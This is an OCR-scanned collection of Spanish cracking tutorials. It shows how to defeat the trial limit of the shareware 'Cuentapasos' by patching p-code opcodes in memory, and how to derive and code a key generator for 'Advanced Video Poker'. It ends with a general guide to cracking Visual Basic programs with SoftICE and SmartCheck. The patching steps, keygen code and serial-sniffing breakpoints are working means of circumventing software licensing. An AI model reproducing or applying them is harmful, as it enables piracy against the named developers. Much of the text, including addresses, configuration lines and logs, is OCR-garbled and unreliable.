ahora, no solo se comparten una serie limitada de funciones, sino que todas las instrucciones 
que puede ejecutar un programa se han portado a una serie de pequeñas "funciones" en las 
librerías del VB. Examinando la librería del VB, podremos identificar gran cantidad de 
instrucciones, algunas muy importantes. 


El Cuentapasos me permitirá ilustrar la importancia de este hecho con más claridad. 


30-6 =36 


Nos centramos en el cálculo de los días que nos restan para acabar el periodo de evaluación. La 
nagscreen y el 'acerca de...' del Cuentapasos nos muestran los días transcurridos y los días que 
nos restan. 


Ahora bien, ¿me puede decir alguien cómo puede cualquier aplicación (no solo el Cuentapasos), 
sabiendo los días transcurridos y el número de días máximo (30), calcular los días que nos 


Llegados a este punto algunos pensareis que Mr.Blue está completamente "grillao". La 
respuesta es clara, restando. La resta, en ensamblador, se realiza mediante la instrucción "SUB". 
¿Y cómo se hace en p-code? Pues como hemos visto, tiene que exisitir una porción de código en 
MSVBVMS50.DLL que se utilice para hacer la resta. ¿Vais cogiendo la onda...? ¿Sentís el 
cosquilleo por la espalda ....? 


Si localizamos dónde se encuentra esa porción de código, podemos colocar un punto de ruptura 
en ella. Puesto que cualquier programa realiza un montón de restas, tendremos que limitar este 
punto de ruptura a que los operandos tomen el valor que nos interesa. En el caso de los periodos 
de evaluación, limitaremos a que el operando del que se sustrae, tenga como valor el número de 
días de evaluación, o el número máximo de ejecuciones, o... Las posibilidades son enormes. 


¿Y dóde está esa función? Para encontrarla, podemos seguir traceando el programa, tarde o 
temprano hará una resta. O también podemos, si tenemos el VB, generarnos un p-code que haga 
restas, sumas y todas las funciones que queramos descubrir. No tenemos más que pasarlo por el 
Softlce. 


La resta nos la encontramos en OFOFDF78h, y el resto de funciones aritméticas se encuentran a 
su alrededor. Encontramos multiplicaciones de enteros, de flotantes, operaciones lógicas,... todo 
un surtido. 


La función de resta de enteros, al igual que la de suma de enteros que está más arriba, se 
encuentran para operadores de 16 bits y para operadores de 32 bits. Si queremos colocar puntos 
de ruptura, los tendremos que colocar por duplicado: 


O0FOFDF78 pop eax 

OFOFDF79 sub [esp], eax 
OFOFDF7C jo OFOFDACA 

0FOFDF82 xor eax, eax 

O0FOFDF84 mov al, [esi] 

0FOFDF86 inc esi 

O0FOFDF87 jmp ds: [eax*4+0F0FED94] 


Esta función, saca un operador de la pila y se lo resta al que queda en la misma. El resultado 
queda almacenado en la pila, saltando a OFOFDACAR en caso de overflow (EAX>(ESP)). 


En mi Cuentapasos, los días transcurridos son seis así que coloco un punto de ruptura en 
OFOFDF79 de la forma bpx OFOFDF79 if (*(esp)==1E) (eax==6). 


Lo colocamos también en la versión de 16 bits, por si las moscas: bpx OFOFDF62 if 
(* (esp) ==1E) € (ax==6). 


Pulsamos Ctrl+D, ejecutamos el Cuentapasos y aparecemos en OFOFDF79. Efectivamente, la 
aplicación está intentando hacer 30-6. Examinamos a donde apunta ESI. A la dirección 
4ADFA48h, del ejecutable del Cuentapasos. En realidad, ESI está ya apuntando a la siguiente 
instrucción a ejecutar (hace las veces de EIP). La instrucción que nos trajo aquí es el byte 
'OAER' de 4ADF47h. 


Aquí, al igual que en el caso anterior podemos cambiar dos cosas: 


e Los operandos. Para cambiarlos tendríamos que retroceder, poner un punto de ruptura 
antes y ver de donde saca el Cuentapasos los valores de los operandos. Para ello, lo 
mejor es colocar un punto de ruptura de acceso a memoria en direcciones anteriores a 
4ADF47h (nuestros antiguos bpx, se convierten en bpm's). Después traceamos y vamos 
viendo con atención de donde van saliendo los operandos (ingeniería inversa hacia 
atrás). 

e La instrucción. Podemos cambiar la resta por otra instrucción, o mejor, por una suma ;- 


) 


¿Como hacemos esto? ¿Cuál es el código de la suma? Veamos, el código de la resta (32 bits) 
como hemos visto es OAEh. La función de suma, nos la encontramos algo más arriba, en 
OFOFDF3DH. Para saber su código, nos vamos a la tabla de OFOFED94h. El puntero a la función 
resta, debe encontrarse en: 


4*0AEh + OFOFED94h = OFOFF04Ch 


Nos vamos allí, y efectivamente encontramos la dirección de la función resta de 32 bits. Vamos 
a ver donde está el puntero a la suma, no debe estar muy lejos. La encontramos cuatro palabras 
más arriba, en OFOFFO3Ch. El código de la suma será por tanto: 


(OFOFFO3Ch - OFOFED94h) / 4 =0AAh 


El crack consitirá en sustituir en aquellos lugares en donde se realice la resta, 30-6 (6 en mi 
caso), el código de la operación resta (DAERh) por el de la suma (OAAh). 


Pulsamos Ctrl+D y vuelve a saltar enseguida el Softlce. En esta ocasión, el culpable es el OVAEh 
situado en 4ADFA9h. Lo anotamos y volvemos a pulsar Ctrl+D. Nos aparece la nagscreen. 
Vamos a por el 'acerca de...”. Pulsamos Aceptar y abrimos el 'acerca de...' .. otra vez nos salta el 
Softlce, otro código de resta en 04A4716h. Anotamos y Ctrl+D... otro más en 04A4769h. Este 
es el último. 


Repetimos la prueba, pero ahora, en el primer punto de ruptura, sustituímos los bytes OAEHh de 
4ADF47h, 4ADFAJ9h, 4A4716h y 4A4769h por DAAh. Realizar un cargador que, además de 
pulsar el botón de la nagscreen tal y como se ha explicado, realice los parches en memoria 
necesarios es sencillo. Tenéis un ejemplo en otro tutorial de Esiel2, que casualmente versa sobre 
el antecesor del actual Cuentapasos. 


Quitamos los puntos de ruptura, para probar, Ctrl+D y ...... 


Leda ;-) p-code rulezzz!! 


Conclusiones. 


Hemos mostrado como una protección como la de la nagscreen, correctamente implementada 
por el autor de la aplicación, puede ser fácilmente burlada porque el autor cometió el "error" de 
programar en Visual Basic. De paso, hemos sacado del baúl una técnica casi olvidada pero de 
una gran potencia, mediante la cual podríamos entre otras cosas, automatizar tareas, rellenar 
formularios automáticamente, gastar bromas, etc... 


Hasta aquí, nada nuevo. 


La novedad es el p-code. Inicialmente, en una primera toma de contacto, los programas p-code 
confunden y pueden terminar por aburrir al más intrépido ingeniero inverso. Está invención de 
Microsoft, desde el punto de vista teórico, puede parecer un gran avance ya que está a un paso 
de la creación de programas que puedan ejecutarse en cualquier máquina, independientemente 
del procesador o sistema operativo, siempre y cuando existan unas librerías diseñadas para 
dicha máquina o sistema operativo que interpreten el código del ejecutable. 


Nada más lejos de la realidad. Lo que en código nativo es una simple instrucción como la resta, 
se convierte en los programas p-compilados en varias instrucciones. Igual ocurre con el resto: 
push, add,... Esto, inevitablemente conduce a que las aplicaciones se enlentezcan o, lo que es lo 
mismo, que necesitemos más recursos (procesadores más rápidos) para poder mantener las 
mismas prestaciones. Esta política de Microsoft, por supuesto favorece a los fabricantes de 
hardware como Intel. 


Desde el punto de vista de la ingeniería inversa, supone una metedura de pata más de Microsoft 
(y van ...). Identificando convenientemente las funciones de interés, podremos facilmente 
desentrañar las protecciones de las aplicaciones. En este tutorial se ha expuesto un método que 
puede, sistemáticamente, echar abajo casi cualquier sistema de protección de aplicaciones p- 
compiladas, basado en limitaciones en el número de ejecuciones, periodos de pruebas, etc... Es 
cuestión de acostumbrarse, donde poníamos antes breakpoints de ejecución ahora ponemos 
breakpoints de acceso a memoria, donde el EIP decía ahora dice el ES... 


En cierto modo es triste ver como los desvelos de un programador por proteger su aplicación, 
colocando protecciones a diestro y siniestro, y creando un sistema de protección en conjunto 
bastante robusto, salta en mil pedazos por el hecho de haber utilizado Visual Basic y su "p- 
compilación". Si el futuro del Visual Basic pasa por el p-code ... o le abrimos los ojos a los 


programadores y reaccionan o creo que la ingeniería inversa de VB se va a volver muy aburrida. 


Para ilustrar dicho método, lo hemos utilizado contra una de las pocas aplicaciones p- 
compiladas que he podido encontrar (por ahora): nuestro entrañable Cuentapasos. Pero no creais 
que sus protecciones se limitan tan solo a la nagscreen y al periodo de evaluación. ¡Que va! El 
Cuentapasos no se acaba ahí, esconde muchos más secretos. Desviaros de la senda seguida en 
este tutorial para deshacer su protección, buscad caminos alternativos. Quedan muchas 
preguntas por responder: 


e Dónde se guardan los días transcurridos? O se guarda la fecha de instalación? 

e Dónde se guarda el otro protagonista de la resta, el límite de 30 días? ¿Y si lo 
cambiamos? 

e Cómo se registra el programa? De dónde sale el código de compra? 

e Por qué no cambia el número de días transcurridos si cambio la fecha? Cuándo se 
actualiza? 

e El cálculo de los días transcurridos, es igual al ejecutar las primeras veces el 
Cuentapasos que después? 

e Por qué en algunos ordenadores se cierra el programa a los pocos minutos de conexión? 


Investigad, y os encontrareis destellos de calidad del programador, de los que da gusto encontrar 
en un producto nacional, y alguna que otra metedura de pata, de las que hacen que te caigas al 
suelo de risa ;-D 


Como veis, se podría escribir un libro sobre el Cuentapasos (este tutorial ya es casi un libro). 


En cierta manera somos nosotros los que obligamos a los programadores a profundizar en el 
arte de la programación. Y gran parte de lo que aprenden en el sano intento de "jodernos", lo 
aplican en otras facetas de sus aplicaciones, mejorando sus prestaciones. Aunque la mayoría no 
lo quieran reconocer, parte de lo que saben nos lo deben a nosotros, los "crackers". 


Y por supuestísimo, parte de lo que sabemos nosotros se lo debemos a las "comeduras de coco" 
de ellos a la hora de implementar una protección. 
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.... Al borde del siglo XXI aún utilizaban aplicaciones Micro$oft ... 


Whiskey Kon Tekila 


Programa Advanced Video Poker v1.1 | W95 / W98 / NT 
Descripción Juego de Poker al estilo Casino 
Tipo Shareware 


Url http://www.aha.ru/-aasamson/download/ 


[Protección | Número de Serie. Time Limit 30 Dias 

[Dificultad 1) Principiante, 2) Amateur, 3) Aficionado, 4) Profesional, 5) Especialista 

| Herramientas  [Smartcheck v6.01 (Build 952) 

Objetivo | Buscar el número de serie y crear su Key-Generator 

Cracker [Mr.GReeN [WkT!] 

ea de Ags de 


Vi 


Introducción 


El programa es un clásico juego de Poker al estilo de los casinos norteamericanos, 
ameno y bonito. Su protección es de 30 dias, libre de nags o recordatorios que nos 
induzcan a registrar el programa. Pasados los 30 dias se acabó, no juegas más. 
Programa elaborado en Visual Basic e interesante para comenzar a usar Smartcheck 
para estudiar el comportamiento de la rutina generadora del número de serie 


Vi 


Manos a la obra! 


Cargamos Smartcheck y desde ahí lanzamos el programa que vamos a estudiar. Bien 
, vamos a incorporar gráficos para ilustrar mejor el comportamiento de Smrtck, de 
acuerdo? Así nos resultará más fácil de comprenderlo (y menos teclas a tocar pa mi 
xDDDD). Lanzamos el programa desde la opción Program/Start y una vez dentro de 
él nos vamos a la opción Register. Entramos como nombre: Usuario 
Registrado[WkT!] y como número de serie, mi número mágico: 9900990099, ¡vale, 
vamos allá! 


String [85] -> Integer [85] 


Integer (170) -> String (1 70") 


$% ValStrina:'170") retums double:170 [displayed as single-precision floating point 
$% Mid$íStrina: "Usuario..." long:2, VARIANT:Integer:3] 

»£ 

$% Asc(String: "Usuario ..."') retums Integer:85 

9% SiWVARIANT:Double:255) 

P. String ("255") --> Integer (255) 

A 

$% ValString:'"370") retums double:370 [displayed as single-precision floating point 
9% Mid$(Strino:"Usuario ...", long:3, VARIANT: Integer: 4) 


double:572 [displayed as single-precision floating point 
$% Mid$(String:"Usuario ...", long:4, VARIANT:Integer:5) 

9% AscíString: "ario '") retums Integer: 97 

$% AscíString: "Usuario ...”) retums Integer:85 

$% SiWVARIANT:Double:657) 


. 2 Cria MMLCERFRIAL s lrtrarmar (10571 


Mirad bien el comportamiento de la rutina. Toma el primer caracter del nombre y su 
código ASCII y se suma consigo mismo, al resultado le llamaremos SUMA 
(170=85+85), luego toma el segundo caracter (s) cuyo valor ASCH es 115, ok?, 


85 (cód ASCHU de "U"), sume- mos otra vez: 170+85+115= 370, ahora SUMA=370. 
Ya tenemos la fórmula, SUMA + Cód.ASCII del primer carácter del nombre + cód. 
ASCII de cada uno de los caracteres del nombre, al final, esto dá un resultado, en 
este caso: 4355, Bien qué hace, además, la ru- tina de cálculo del número de 
serie???, veamos: 


Integer (4355) --> String ("'4355""] 
WalíString:"'4355"] returns double:4355 [displayed as single-precisic 


Len(VARIANT[Double: 4355] feturns LONG:7793016 

Len(vARIANT|Double:8710) returns LONG:7793016 

Len(YARIA4NT|Double:85710] returns LONG:7793016 

Len(vARIA4NT bee returns LONG:7793016 
Len(YARIA4NTID ouble:1 4420] returns LONG:7733016 
LenfVARIANT returns LONG: 7793016 
Len VARIANT retums LONG:7793016 
Len(vARIANTiDouble:69680] returns LONG:7733016 
Len(YARIA4NT Double: 0) returns LONG:7793016 
LenfVARIANT:Double: 139360) retums LONG:7793016 


Len(vARIANT:Double:139360] retums LONG:7733016 
Len(YARIANT:D ouble: 278720] retums LONG:7793016 


do 
Le 
Lo 
% LenVARIANT:Double:278720]/retums LONG:7793016 
% Len(VARIANT:Double:557440)lretums LONG:7793016 
Lo 
do 
Lo 
Lo 
do 


ybbo4bo..e. y 
Lo fe Le Le fe £e Le £e ía 


Len(YARIANT:D ouble:557440) retuma LONG:7793016 

Len(váR ANTeuble 114860500) retumns LONG:7793016 
Len(vARIANT Double 114888+006] returns LONG:7793016 
Len(YARIANT:Double:2.22376e+006] returns LONG:7793016 


Len(YARIANT:Double:2.223976e+006] returns LONG:77393016 


el RATUARIT Mil A AE OOO tc MAI RINA 


Bueno, parece fácil, no?. 4355 * 2 = 8710; 8710 * 2 = 17420; etc. etc. etc...., pero 
cuan- tas veces realiza esta operación?, 36 veces, al final dá un número LONG que 
parece ser el número de serie deseado, veamos, despues de la larga cuenta, nos 
arroja: 748183302963- 20, parece un numero de serie en toda regla, pero aún no 
acaba la cosa aquí, porque si en- tramos este LONG, nos lo escupe con los siento 
Burt Lancaster, la cagaste. :) Así pues, con tinuamos. 


$% LenvAHIAN IU OUDIe: /.491938+U13) retums LUNA: /¿33U Ib 
$% Len(VARIANT:Double:7.48183e+013) retums LONG:7793016 


Len(ARIANT:Double:1.49637e+014) returns LONG:77393016 
Ea txtCode.Text 
Ela txiCode.Text 


Aqui, subrayadito esta: 149637e+014, o sea: 149636660592640, 
Uallllaaaaaaaaaa!!!!. Exito total, lo entramos y.... Thanks!!! el mensaje feliz! Yatá, I 
got it!!! That's all folk!!!. 


Pero que ha hecho?. Lo ha reducido. Mientras la cifra final sea mayor que 
200000000000000H, cifra = cifra /2, esto os lo digo yo que me lo he curra o:) 


Bien ya tenemos todos los ingredientes para confeccionar el KeyGen. Amos allá! 


Suma=Asc(ler. caracter nombre) + asc(cadauno de los caracteres del nombre), 
tantas veces como letras tenga el nombre. En Basic seria algo así: 


L=Len (nombre$) .......... Longitud del nombre. 


(cod.asc.primer.caracter) btt = Asc(left$(nombref$, 1)) ... en nuestro caso: 85 


Ahora vamos a buscar el número sagrado que se vá multiplicar 36 veces. Sería algo 
asi: 


Forx=1ToL 


ef = Asc(MidS(nombre$, x, 1)):....en e se lamacena el ASCII de cada caracter del 
nombre 


suma+t = sumatt + ef + bH 


Next 
Ok!, en suma tenemos yá almacenado el numero dorado, 4355 


La segunda parte es: 


Forx=1 To 36 
suma+ = suma+ + suma+t 
Next 


sumatt = 74818330296320, pero no nos vale. 
la tercera parte del keygen es: 


While suma? >= 200000000000000+ 
suma+t = suma+t / 2 
Wend 


Ahora suma+f contiene el serial correcto para ese nombre: 149636660592640 


y ya hemos confeccionado el KeyGen. No es ná, gracias y tá otra! 


[ Entrada | Documentoz Genéricoz | WKT TEAM Main Site ] 
[ Todo el ECD | x Tipo de Protección | x Fecha de Publicación | x orden Alfabético ] 


CRACKEANDO EN 
VISUAL BASIC 


Tutorial por: Esiel2. 
1) Introduccion. 
2) Primeros Pasos: Configuracion de Nuestras Herramientas. 
3) Descompiladores para Visual Basic. 
4) Crackeando Usando el Soft-Ice. 
5) Crackeando Usando el Smartcheck. 
6) La Alternativa: La Funcion Hmemcpy. 


7) Lista de Posibles Breakpoints en Visual Basic 5 y ¿6? 


1) Introduccion. 


Antes de empezar quisiera decir que hago este tutorial para que quien lo 
lea sepa lo basico a mi entender que debe tener de herramientas y unos 
conocimientos de algunas funciones que tanto le gusta llamar el visual 
basic, a su dll de alma (nunca mejor dicho) MSVBVM50.DLL o la 
ultima version MSVBVM60.DLL para poder hacer algo interesante sin 
que nada nos estorbe. Cada vez nos encontramos con mas programas 
hechos en visual basic, espero que este tutorial te sirva para abordarlos. 


Las herramientas necesarias o imprescindibles, mas bien esto 
ultimo son el poco ;) conocido Soft-ice y el Smartcheck, cuanto mas 
actualizado pues mejor ;). Espero que te sirva de base para crackear 
estos programas, y si te fijas, no cambia mucho la forma de afrontar las 
protecciones con respecto a otros programas compilados en otros 
lenguajes. 


2) Primeros Pasos: Configuracion de Nuestras Herramientas. 


Lo primero de todo claro esta es despues de tener las herramientas, configurarlas como 
'dios' manda para que haga lo que nosotros necesitamos ya que si no de poco nos sirve bajarnos 
tantos megas. 


Para configurar el soft-ice, no hay problema porque si ya hemos crackeado antes 
tendremos bien configurado el programa, no obstante aqui pongo mi winice.dat (cada uno lo 
puede adoptar a sus gustos, seguro que hay mejores formas, pero a mi me va bien asi) por si hay 
dudas al respecto: 


// Aquií empieza // 


NMI=ON 
SIWVIDRANGE=0N 
LOWERCASE=0N 
MOUSE=0N 
NOLEDS=0FF 
NOPAGE=0FF 
PENTIUM=0N 
THREADP=0N 
VERBOSE=0N 


PHYSMB=128 
SYM=312 
HST=512 
DRAWSIZE=2048 
TRA=8 


INIT="WL;WR;WD;X;" 


Fl="h;" 
F2="»wr;" 
F3="src;" 
F4=""1s;" 


F5="Ax; " 


F6=""ec;" 

F7=""here;" 

ES=""" 

F9=""bpx;" 

F10="2p;" 

F11=""G ESS:ESP;" 
F12=""p ret;" 
SF3=""format;" 
CF8=""XT;" 
CF9="TRACE OFF;" 
CF10=""XP;" 
CF11="SHOW B;" 
CF12="TRACE B;" 
AF1=""wr;" 

AF2=""wd;" 

AF3=""wc;" 
AF4="»ww;" 
AF5="CLS);" 
AF8="A»XTR;" 
AF11=""dd dataaddr->0;" 
AF12=""dd dataaddr->4;" 
CF1="altscr off; lines 60; wc 32; wd 8;" 
CF2=""wr;"wd;wc;" 


EXP=c.Wwindowsisystemikernel32.dll 
EXP=c.Wwindowsisystemiuser32.dll 
EXP=c.Wwindowsisystemigdi32.d1l 
EXP=c.Wwindowsisystemibivbx10.dll 
EXP=c.Wwindowsisystemicomdlg32.dll 
EXP=c.Wwindowssystemishell32.d1l 
EXP=c.Wwindowsisystemiadvapi32.dll 
EXP=c:.1Wwindowslsystemishell232.d1l 
EXP=CAwindowslsystemibivbx10.dll 
EXP=c.Wwindowsisystemicomcetl32.d1l 


WDMEXPORTS=0FF 
MONITOR=0 
PHYSMB=16 
SYM=312 

HST=256 

TRA=8 

MACROS=32 
DRAWSIZE=2048 


; WINICE.DAT 


; (SIWOSWINICE.DAT) 
; for use with SoftICE Version 3.2 (Windows 95) 
; 14 July 1997 


O O O O OO OOO ORO RON 
> 


; If your have MORE than 32MB of physical memory installed, change 
; the PHYSMB line to the correct ++ of Megabytes. 

; If you have LESS than 32MB you can save a bit of memory by 

; Specifying the correct + of Megabytes 

; Example: PHYSMB=32 

AE AAA AE ARAS ERA AREA AAN REA 
y ee Examples of sym files that can be included if you have the SDK +++ 
; Change the path to the appropriate drive and directory 
¡LOAD=cAwindowsisystemluser.exe 
¡LOAD=cAwindowsisystemligdi.exe 
¡LOAD=cAwindowsisystemikrn1386.exe 
¡LOAD=cAwindowsisystemimmsystem.dll 
¡LOAD=cAwindowsisystemiwin386.exe 

y ee Examples of export symbols that can be included *+**+** 

; Change the path to the appropriate drive and directory 
¡EXP=cwindowsisystemWvga.drv 

¡EXP=cAwindowsisystemWga.3gr 
¡EXP=cwindowsisystemisound.drv 
¡EXP=cAwindowsisystemimouse.drv 
¡EXP=cwindowsisysteminetware.drv 
¡EXP=cwindowsisystemisystem.drv 
¡EXP=cwindowsisystemlkeyboard.drv 
¡EXP=cwindowsisystemitoolhelp.dll 
¡EXP=cwindowsisystemishell.dll 
¡EXP=cwindowsisystemicommdlg.d!l 
¡EXP=cwindowsisystemlolesvr.dll 
¡EXP=cwindowsisystemlolecli.dll 
¡EXP=cwindowsisystemimmsystem.dll 
¡EXP=cwindowsisystemiwinoldap.mod 
¡EXP=cwindowsiprogman.exe 

¡EXP=cwindowsidrwatson.exe 

y ee Examples of export symbols that can be included for Windows 93 “tes 
; Change the path to the appropriate drive and directory 
¡EXP=cwindowsisystemicertdll.dll 
¡EXP=cwindowsisystemWersion.dll 
¡EXP=cwindowsisysteminetlib32.dll 


¡EXP=cAwindowsisystemimsshrui.dll 
¡EXP=cwindowsisystemimsnet32.dll 
¡EXP=cwindowsisystemimspw132.dll 
¡EXP=cwindowsisystemimpr.dll 
:exp=cwindowsisystemimsvbvm50.dll 
exp=c1windowsisystemimsvbvm60.dll 


// Aqui termina // 


Estas dos ultimas lineas del fichero winice.dat son importantisimas, si el programa que 
vas a crackear esta hecho en visual basic 5 (msvbvm50.dll) tienes que quitarle el ';' para que el 
soft-ice detecte cuando llama a dicha libreria porque si no ignoraria los breakpoints aunque este 
activa la del visual basic 6 (msvbvm60.dll), por lo demas funciona igual que con cualquier 


programa a crackear. 


Para configurar el smartcheck, tienes que ir menu program y en settings poner lo siguiente: 


21x] 


Error Detection | Reporting | Files to Check | Error Suppression | Program Info | 


SmartEheck can detect and report mary bypes of problema. Elick on a type to 
see additional settings. Clear a type if you dor't ant to check for thoze kindz 


of problernz. 


Type of errors ta check for Additional settings 


E: Memory errors e Erecktorunitaleed memornerrare 
12] Pointer errors 
Leaks 


[2] API and OLE function call error: 


Report errors immediately 


Adwanced... | 
T” Save theze settings as the initial values for new programes Default Settinos | 


Cancel | Help | 
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Error Detection Reporting | Filez to Check | Error Supprezsion Program Info | 


SmartEheck vall normally begin reporting events and errors immediately after starting the 
program. li pou mould hke to control when event reporting starte, clear the setting below. 


A A E E A 


O A ee 


— Report additional event: 
Information about the eventz below 1: z=ometimez valuable in diagnosing problems, but 
can significantly increaze the disk space used by SmariCheck as ibreporte evente. 
Select the evente pou would like SmartCheck to Include in its reporte. 
[Y Report handled Wisual Basic runtime errors 
[e Perform analysis of handled Visual Basic runtime errors 
Report Mouselmowe events from DC controls 
[- ReportWéindows messages 
[Y Report callback and hook function: 


Cancel | Help | 


Despues de tener configurarado las herramientas, es hora de entrar en materia con mas 
salsa. 


3) Descompiladores para Visual Basic 


Descompiladores de visual basic, que yo sepa existe para la 
version 3.0 de este lenguaje en la pagina de DODI (facil de buscar en 
cualquier buscador de internet como en altavista o yahoo), y me parece 
que existe otra version para el visual basic 4.0 pero yo no he probrado 
ninguna de las dos, asi que no puedo decir nada mas. En cuanto a las 
versiones 5.0 y 6.0, por lo menos hasta el momento de escribir este 
tutorial creo que no existe (no verlo, no quiere decir que no exista), asi 
que mala suerte no podemos usar ningun descompilador para los 
programas mas nuevos e interesantes. 


4) Crackeando Usando el Soft-Ice. 


Para empezar, tengo que decir esta herramienta sirve de igual 
modo para los programas realizados en visual basic que en los demas, 
solo hay que tener en cuenta unas cuantas cositas basicas como saber 
que cuando el programa a crackear te pide un password o un serial, este 
es guardado en una variable en formato ancho, es decir, si la clave fuese 
'esiel2' se almacenaria como 'e sie 12' con lo cual si hacemos una 
busqueda en memoria no encontrariamos ninguna direccion donde 
estaria almacenada y nos quedariamos algo extrañados(pero existe un 
breakpoint para esto muy interesante como son: 
MultiWideToWideChar y WideCharToMultiWide), con lo cual quiero 
decir que esto es un dato muy a tener en cuenta. 

Aclarado esto, ¿como podemos abordar un programa en Visual 
Basic utilizando Soft-Ice? ... Pues lo primero a mi modo de ver es lo 
siguiente, yo establecería una regla de semejanza, suponiendo que 
hayas hecho antes un crack, entonces los breakpoints de la derecha te 
deben ser familiares. 


VB breakpoints Breakpoints "normales" 
rtemsgbox messagebox/a/exa 
rtcinputbox getwindowtext/a, 

getdlgitemtext/a 
_ vbanew,  vbanew2 - dialogbox, 
dialogboxparam/a 
— vbastrcomp - Istremp 


Con estos breakpoints, ya te puedes hacer una idea de lo que se 
puede hacer, eso si, la cosa no es tan directa como en cualquier 


programa hecho en un leguaje de programacion decente asi que para 
llegar al meollo de lo que busques tendras que pasar de mucho codigo 
inservible pero todo llega, asi que solo es cosa de tener PACIENCIA. Y 
todo se reduce a trazar el programa como si no fuese realizado en 
Visual Basic. 


Luego, por ejemplo con rtemsgbox al usarlo tendrias que 
remontar codigo hacia atras para encontrar donde el programa ha 
tomado la decision de no registrarte para converncerle de lo contrario 
(es a lo que yo le llamo cracking retro, puesto que tienes ir siempre 
hacia atras en el codigo) esto es una tarea facil pero pesada ya que hay 
muchas llamadas inutiles. En cuanto al rtcinputbox, pues lo tipico, al 
introducir la clave o serial y pulsar sobre el boton aceptar pues 
volvemos al codigo y hariamos lo tipico que se suele hacer con las 
funciones getwindowtext/a y getdlgitemtext/a. El tercer breakpoint 
importante para mi es el__vbanew y __vbanew2 ya que mediante el 
podemos parar la ejecucion del programa antes de que nos saque un 
formulario, este breakpoint es muy util para los programas que tienen 
basada su proteccion en nagscreens. En cuanto a __ vbastrcomp, pues 
casi su propio nombre indica para que sirve asi que paso decir nada 
mas. ;) .... MUY UTIL. 


Como caso excepcional, esta el breakpoint rtcdoevents, ya que 
este breakpoint es muy usado por el compilador del visual basic, con lo 
cual puede parecer que no nos es de gran ayuda puesto que 
constantemente lo esta llamando pero sin embargo si lo es por la 
siguiente razon: cuando un programa realizado en visual basic tiene que 
realizar calculos que consume muchos recursos del sistema pues para 
no colgar el windows 9x pues el programador se ve obligado a insertar 
en el codigo la funcion doevents, con lo que se puede entrar en bucles 
donde solo se hagan calculos como por ejemplo en el cuentapasos el 
autor hace muchos calculos pero nosotros solo vemos la nagscreen pero 
mediande este breakpoint pues le jodemos el invento, asi que como 
conclusion, esta funcion es util cuando estamos seguros de que el 
programa hace muchos calculos y nosotros queremos meternos dentro 
para husmear un pokito. XD. 


Un ejemplillo de como crackear de esta manera lo podeis ver 
hechandole un vistazo al tutorial del Cuentapasos 3.72 y del Exploit 
Submission Wizard 5. 


5) Crackeando Usando el Smartcheck, 


Bien, el smartcheck es otra gran herramienta de los geniales 
programadores de Numega, pues con esta herramienta podemos ver las 
tripas de los programas realizados en Visual Basic, desde un simple 
vistazo y encontrar un serial valido, hasta ir analizando que va haciendo 
el programa paso a paso, como asiganaciones de variables sospechosas, 
conversiones de tipos de datos, acceso a apis, etc, etc. Luego, 
sabiendolo usar simplifica mucho el cracking para estos programas, 
pero como todo en la vida, lo mas importante es la experiencia, cuanto 
mas utilices este programa antes te daras cuenta de que es lo que 
verdaderamente te interesa ver y que es lo que te trae sin cuidado. 


Para hacer un cracking en 2 minutos lo mas comun es que nos 
pidan el tipico nombre y serial, e inmediatamente despues pues nos 
saque un bonito mensaje mediante msgbox del visual basic, pues 
mirando alrededor de este msgbox dentro del smartcheck pues nos 
encontraremos con un serial valido para nuestro nombre, asi de facil !!!. 
Tambien podemos hacer un generador de claves de forma relativamente 
sencilla puesto que si estamos viendo constantemente las asignaciones, 
conversiones de variables, comparacines, ... con los valores que van 
tomando en la ventana de la parte derecha del monitor asi pues solo 
tenemos que analizar con detenimiento y paciencia el listado que nos 
saca el smartchek y generar nuestro generador de claves. 


Un ejemplo sencillito de como crackear programas de esta forma 
es el tutorial del programa: Java script It! v1.3. 


6) La Alternativa: La Funcion Hmemcpy. 


Bien, esta funcion no suele comentarse mucho en los tuturiales 
pero es otra gran baza para nuestro menester puesto que como bien 
comenta Wkt_White en su tutorial generico sobre el uso de esta funcion 
podemos cazar los password o serial de una manera un poco sutil y facil 
(todo depende de los programadores, aunque si utilizan este lenguaje, 
no creo que se calienten la cabeza por impedir que esta funcion no nos 
sirva XD), en la mayoria de programas realizado en este lenguaje, 
aunque tengo que decir que siempre hay excepciones. 


Para ello, los pasos basicos a seguir (casi mecanicamente) son los 
siguientes: Primero despues de saber que es un programa VB, 
introducimos nuestro serial, ponemos el breakpoint bpx hmemcpy 
pulsamos Ctrl-D e inmediatamente pues volvemos al soft-ice y tenemos 
que FIJARNOS bien que en la linea que hay debajo del desensamblado 
aparezca nombredelprogramaacrackear!.text y a partir de aqui mirar 
detenidamente los push siguientes ya que se suelen almacenar el que tu 
has introducido y el correcto; si miras estos push, lo mas normal es que 
te encuentres con tu serial introducido 'e sie 12' y por ejemplo el 
correcto que podria ser 'EXPEDIENTE - X', ahora solo queda 
borrar los breakpoints y probar con este serial que has obtenido y en el 
75 % o mas de las veces es el serial correcto. 


NOTA: si te fijas las cadenas estan en formato ancho. El serial seria: 
'EXPEDIENTE - X'. 


7) Lista de Posibles Breakpoints en Visual Basic 5 y ¿6? 


Esta lista la obtuve de un tutorial en ingles, y no recuerdo 
exactamente el autor ya que la cogi, la corte del documento y lo puse en 
otro fichero para cuando me hiciese falta consultarlas, asi que ;(. 


Lista: 


Addr:OFOOA1BF Ord: 100 (0064h) Name: ThunRTMain 
Addr:0F03A65D Ord: 101 (0065h) Name: VBDIlUnRegisterServer 
Addr:0F05A843 Ord: 102 (0066h) Name: VBDIlICanUnloadNow 
Addr:0F0BF123 Ord: 103 (0067h) Name: VBDlIRegisterServer 
Addr:0F03137D Ord: 104 (0068h) Name: VBDIIGetClassObject 
Addr:0F04027D Ord: 105 (0069h) Name: UserDllMain 
Addr:0FOCDB46 Ord: 106 (006Ah) Name: DllRegisterServer 
Addr:0F0CDD17 Ord: 107 (006Bh) Name: DllUnregisterServer 
Addr:O0FOSC5AE Ord: 108 (006Ch) Name: __vbaAryLock 
Addr:0FOD9OFS Ord: 109 (006Dh) Name: __vbaBoolErrVar 
Addr:0FOD90EC Ord: 110 (006Eh) Name: __vbaStrErrVarCopy 
Addr:0F109E57 Ord: 111 (006Fh) Name: __ vbaAryVarVarg 
Addr:0F10A259 Ord: 112 (0070h) Name: __vbaFpCDbIR4 
Addr:0F10A259 Ord: 113 (0071h) Name: __vbaFpCDbIRS 
Addr:0F10A242 Ord: 114 (0072h) Name: _ vbaFpCSngR4 
Addr:0F10A242 Ord: 115 (0073h) Name: __vbaFpCSngR8 
Addr:0F10A270 Ord: 116 (0074h) Name: __vbaFpCmpCy 
